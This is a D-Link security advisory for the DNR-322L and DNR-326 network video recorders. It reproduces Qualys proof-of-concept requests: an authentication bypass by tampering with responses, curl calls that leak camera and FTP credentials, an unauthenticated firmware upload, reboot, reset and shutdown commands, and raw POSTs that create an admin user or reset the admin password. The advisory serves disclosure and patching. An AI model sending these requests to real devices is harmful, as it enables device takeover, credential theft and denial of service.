Overview

The D-Link DNR-322L Rev. Ax and DNR-326  Rev. Ax with fimrware versions 1.x and older are exposed to multiple vulnerabilities including authentication bypass, remote information disclosure, arbitrary firmware upload vulnerability and denial-of-service vulnerabilities Exploiting these vulnerabilities could result in data being compromised and the system to be unrellaible and untrusted in a live production network.

D-Link Security Incident Reponse Policy

All public communication on this issue will be offered at http://securityadvisories.dlink.com/security/

Our security response team can be contacted for incident information or to report incidents at security@dlink.com

Any non-critical security issue, help in updating firmware, or configuration regarding this issue please contact your D-Link Customer care channel.

Reference

• Qualys - QSA-2013-02-05 - Qualys Security Research Team - http://www.qualys.com - research@qualys.com
• PC World Article - Link

General Disclosure

Security and performance is of the utmost importance to D-Link across all product lines. This is not just through the development process but also through regular firmware updates to comply with the current safety and quality standards. We are proactively working with the sources of these reports as well as continuing to review across the complete product line to ensure that the vulnerabilities discovered are addressed.  We will continue to update this page to include the relevant product firmware updates addressing these concerns. In the meantime, you can exercise the below cautions to avoid unwanted intrusion into your D-Link product.

Immediate Recommendations for all D-Link device customers

• If you receive unsolicited e-mails that relates to security vulnerabilities and prompt you to action, please ignore it. When you click on links in such e-mails, it could allow unauthorised persons to access your router. Neither D-Link nor its partners and resellers will send you unsolicited messages where you are asked to click or install something.
• Make sure that your wireless network is secure.
• Do not provide your admin password to anyone. If required we suggest updating the password frequently.

Details

The following information is extracted directly from the author, Bharat Jogi, Qualys, whom reported vulnerability:

1) Authentication bypass vulnerability

Dlink NVR 322L and 326 makes use of javascript to check if the authentication to the server is successful or not. This mechanism can easily be bypassed by intercepting the response from the server and then modifying it to bypass authentication.
 

To be more precise,  most of the web pages call /web/function/function.js using:

document.write("script language=\"javascript\" src=\"../function/function.js?id="+sys_time+"\"><\/script>");

The function.js script does an ajax call as follows to check for authentication:

$.ajax({
        type:"POST",
        async:true,
        cache:false,
        url:"/cgi-bin/login_mgr.cgi",
        data:{cmd:'ui_check_wto'},
        success:function(data){                   
            if (data == "fail")
            {
                alert(_T('_login','msg5'))   
                location.replace("/web/login.html");
            }   
            else
                document.cookie = "login_lock=false";
        }
   
    });

/cgi-bin/login_mgr.cgi replies with "sucsess" if the user is authenticated or "fail" if the user is not.
If the reponse from /cgi-bin/login_mgr.cgi is modified or dropped, we can bypass the authentication. This can and was easily done using burp suite.

Once the authentication is bypassed, we can create a new  user by visiting http://<target>/web/account_mgr/account.html.
Also it is possible to change the admin password, once are able to login via the new user that we created.

______________________________________________________________________
 

2) Remote Unauthenticated Information Disclosure Vulnerability

A) Dlink 322L and 326 are exposed to remote information disclosure vulnerability. It is possible to get credentials and status of all the cameras connected to the Dlink NVR.
POC:

curl 'http://<target>/cgi-bin/cgi_main?cmd=modify&xml=1&rand=98'

<Root>
    <IPCamera>
        <ChannelIndex>0</ChannelIndex>
        <CameraName>Camera1</CameraName>
        <HostIP>192.168.0.21</HostIP>
        <Port>80</Port>
        <Brand>D-Link</Brand>
        <BrandID>5</BrandID>
        <ModelName>DCS-2102</ModelName>
        <CameraChannel>1</CameraChannel>
        <Protocol>HTTP</Protocol>
        <UserName>admin</UserName>
        <Password>abcd1234</Password>
        <SupportedProtocols>4</SupportedProtocols>
    </IPCamera>



curl 'http://<target>/cgi-bin/cgi_main?cmd=status&xml=1&rand=98'

<?xml version="1.0" encoding="UTF-8" ?>
<ROOT>
<Status>IPC normal</Status>
<TotalChannels>9</TotalChannels>
<IPCam>
<ChannelIndex>0</ChannelIndex>
<CameraName>Camera1</CameraName>
<HostIP>192.168.0.21</HostIP>
<ConnStatus>Connected</ConnStatus>
<RecordStatus>12</RecordStatus>
<Framerate>4.6</Framerate>
<Bitrate>929.2</Bitrate>
</IPCam>

B) Dlink 322L and 326 are exposed to remote information disclosure vulnerability. It is possible to get stored credentials for backup ftp site:
POC:

curl 'http://<target>/cgi-bin/cgi_main?cmd=archiveserver&xml=1&rand=98'

<?xml version="1.0" encoding="UTF-8" ?>
<Root>
    <Version></Version>
    <ServerCount>1</ServerCount>
    <Server type="FTP">
        <HostIP>abcd1234.com</HostIP>
        <Port>21</Port>
        <Username>root</Username>
        <Password>12345</Password>
        <RemoteFolder>temp</RemoteFolder>
    </Server>
</Root>

C) Dlink 322L and 326 are exposed to remote information disclosure vulnerability.  It is possible to get the exact version of the installed firmware version:

POC:
curl -d cmd=get_firm_v_xml http://<target>/cgi-bin/system_mgr.cgi

REPLY:
======
1.30.0920.2012

______________________________________________________________________

3) Remote unauthenticated arbitrary firmware upload vulnerability

Dlink 322L and 326 are exposed to remote arbitrary firmware upload vulnerability. Remote unauthenticated attackers can upload a modified malicious version of firmware by accessing the page at http://<target>/cgi-bin/system_mgr.cgi

POC:

POST http://<target>/cgi-bin/system_mgr.cgi HTTP/1.1
Host: <target>
Connection: keep-alive
Content-Length: 28
Accept: */*
Origin: http://<taget>
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.64 Safari/537.31
Content-Type: application/x-www-form-urlencoded
Referer: http://<target>/web/system_mgr/upload.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: m_language=en

cmd=cgi_firmware_init_upload
______________________________________________________________________

4) Remote unathenticated Denial-of-Service Vulnerability

Dlink 322L and 326 are exposed to remote unathenticated Denial-of-Service vulnerability. Remote unauthenticated attackers can cause the NVR to reboot, defualt to factory settings and can shutdown the target.

POC:
curl -d cmd=cgi_restart http://<target>/cgi-bin/system_mgr.cgi
curl -d cmd=cgi_restore http://<target>/cgi-bin/system_mgr.cgi
curl -d cmd=cgi_shutdown http://<target>/cgi-bin/system_mgr.cgi

______________________________________________________________________

5) Remotely create a new USER

POST http://<target>/cgi-bin/account_mgr.cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://<target>/web/account_mgr/admin.html
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: <target>
Content-Length: 49
Connection: Keep-Alive
Pragma: no-cache

cmd=cgi_user_add&name=test2&pw=123456&group=admin

______________________________________________________________________
 

6) Remote admin password reset:

POST http://<target>/cgi-bin/account_mgr.cgi HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: en-us
Referer: http://<target>/web/account_mgr/admin.html
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: <target>
Content-Length: 30
Proxy-Connection: Keep-Alive
Pragma: no-cache

cmd=cgi_chg_admin_pw&pw=123456
 

Affected Products

Model Name	HW Version	Current FW Version	New FW Version for this exploit fix
DNR-322L	Ax	V1.xx and older	FW: 2.00b07 Release Notes
DNR-326	Ax	V1.xx and older	FW: 2.10b02 Release Notes

Security patches for your D-Link Product

These firmware updates address the security vulnerabilities in affected D-Link products. D-Link will update this continually and we strongly recommend all users to install the relevant updates.

As there are different hardware revisions on our products, please check this on your device before downloading the correct corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product next to the serial number. Alternatively, they can also be found on the device web configuration.